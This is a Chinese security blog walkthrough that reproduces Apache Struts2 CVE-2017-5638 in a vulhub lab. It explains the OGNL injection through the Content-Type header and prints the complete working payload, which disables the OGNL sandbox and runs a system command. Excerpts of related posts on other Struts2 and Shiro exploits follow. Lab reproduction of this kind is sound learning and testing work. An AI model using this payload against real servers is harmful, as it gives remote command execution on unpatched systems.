Struts2 远程代码执行漏洞 CVE-2017-5638

发表于2026-02-04|更新于2026-03-13|漏洞

|总字数:431|阅读时长:1分钟

影响范围

Struts 2.3.5 – 2.3.31
Struts 2.5 – 2.5.10

漏洞类型

OGNL 表达式注入

操作系统限制

无

配置要求

默认配置

漏洞利用

执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测

利用原理

漏洞产生主要原因是 Struts2 有一个复杂功能，给错误信息赋动态变量，构造的 payload 通过错误信息进入到动态变量，后续通过动态变量抛出报错信息同时执行敏感命令。Struts2 默认使用 Jakarta 库来解析上传文件，通过构造异常的 Content-Type，Jakarta 解析器无法识别并抛出该字符串错误，Struts2 将错误转化为可读错误提示，findText () 函数解析时候，错误信息内有 %(# 符号，识别为需要计算的表达式，OGNL 引擎解析并执行括号里面的 Java 代码，即敏感命令

漏洞复现

用现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/struts2/s2-045
#拉取镜像
docker-compose up -d

可以通过 docker ps 查看镜像

1773317613909

用 burpsuite 抓取 http://公网: 8080 流量包

1773317657503

使用 Repeater 模块

1773317777800

随便添加参数

1773317706752

修改 Content-Type 内容，换成下面的恶意 payload，并删掉加入的参数

%{(#nick='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds={'id'}).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

1773317824744

发送后，响应码为 200，且执行了命令 id

1773317875838

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/04/CVE-2017-5638/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

Struts2 远程代码执行漏洞 CVE-2018-11776

影响范围 Struts 2.3 – 2.3.34 Struts 2.5 – 2.5.16 漏洞类型OGNL 表达式注入操作系统限制无配置要求 alwaysSelectFullNamespace 设置为 true package 标签未定义 namespace 或使用了通配符漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts2 将 URL 路径中的 namespace 当作 OGNL 表达式，在重定向跳转时对其进行二次解析，执行敏感命令。Struts2 中的 URL 结构通常为 http://域名/命名空间/Action 名.action，如果攻击者访问不存在的命名空间，且配置了 alwaysSelectFullNamespace = true，那么会将攻击者注入的 payload 提取出来，将动态变量赋值为攻击 payload，OGNL 引擎解析命名空间时候执行了恶意 payload 漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com...

Struts2 远程命令执行漏洞 CVE-2021-31805

影响范围 Struts 2.0.0 - 2.5.29 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts 内部对象虽然被锁死了，但是 Struts2 运行在 Tomcat 容器，攻击者可以利用 Tomcat 的 InstanceManager 绕过沙箱（相当于 CVE-2021-31805 是对 CVE-2020-17530 修复的绕过），InstanceManager 新建的 org.apache.commons.collections.BeanMap 对象能绕过普通权限检查，直接操作 memberAccess 的私有属性，利用 BeanMap 的 put 方法把 excludedClasses（Struts2 内部的黑名单）改为空，再通过攻击链执行敏感命令。漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/s...

Struts2 远程命令执行漏洞 CVE-2016-3081

影响范围 Struts 2.3.18 - 2.3.28（不包括 2.3.20.2 和 2.3.24.2）漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理在配置文件 struts.xml 开启了 devMode（开发者模式），其中允许通过 method 前缀来动态执行 Action 方法。Struts2 内部存在一个安全沙盒，默认禁止执行危险的 Java 方法，为允许调用执行系统命令所需 Java 类，将上下文访问权限重置为默认，payload 片段为 #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS。权限限制接触后，攻击者通过调用 Java 环境的 Runtime 环境执行系统级别的命令，payload 片段为 @java.lang.Runtime@getRuntime ().exec(‘id’)，其中 id 可替换成其他敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码g...

Struts2 远程代码执行漏洞 CVE-2017-9805

影响范围 Struts 2.1.2 - 2.3.33 Struts 2.5 - 2.5.12 漏洞类型XML 反序列化操作系统限制无配置要求默认配置漏洞利用写入敏感文件，反弹 shell 获取服务器权限利用原理Struts2 框架对外部组件 XStream 插件默认使用 XStream 处理 XML 格式数据，可以将几乎任何 XML 标签映射为 Java 对象，攻击者在 Java 运行库寻找可以执行系统命令的类，由于 XStream 没有限制，攻击者可以构造特殊的 XML，包含触发点、执行链、敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-052#拉取镜像docker-compose up -d 访问 http://公网: 8080/orders 用 burpsuite 抓取 http://公网: 8080/orders/3/edit 数据包发送到 Repeater 模...

Apache Struts 2 远程代码执行漏洞 CVE-2013-2251

影响范围 Struts 2.0.0 - 2.3.15 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理在 Struts2 中，DefaultActionMapper 类支持以” action:”、” redirect:”、” redirectAction” 作为导航或重定向过滤，在这些前缀后面可以加入 OGNL 表达式，Struts2 没有对这些前缀做过滤，可以利用 OGNL 表达式调用 Java 静态方法执行任意系统命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-016#拉取镜像docker-compose up -d 访问 http://公网: 8080，出现 Hello world 即搭建成功用 burpsuite 抓取 http://公网: 8080/index.action 数...

Shiro 认证绕过漏洞 CVE-2020-1957

影响范围 Apache Shiro 1.0.0-incubating - 1.5.1 漏洞类型权限绕过操作系统限制无配置要求 Shiro 拦截器采用了路径匹配模式漏洞利用登录管理后台，信息泄露利用原理在 Shiro 的 1.5.2 之前的版本中，WebUtils.getPathWithinApplication() 方法处理 URL 时候会根据分号对路径进行截断，会认为分号后面不属于路径一部分；而 Spring 框架在匹配控制器路由时候，会对 URL 进行标准化处理（例如解析穿越符..），它对分号处理方式不同。二者对请求的解析不一样，攻击者通过特殊构造/;/路径来绕过 Shiro 的过滤漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/shiro/CVE-2020-1957#拉取镜像docker-compose up -d 抓取 http://靶机 ip:8080/admin 数据包发送到 Repeater...

评论

数据加载中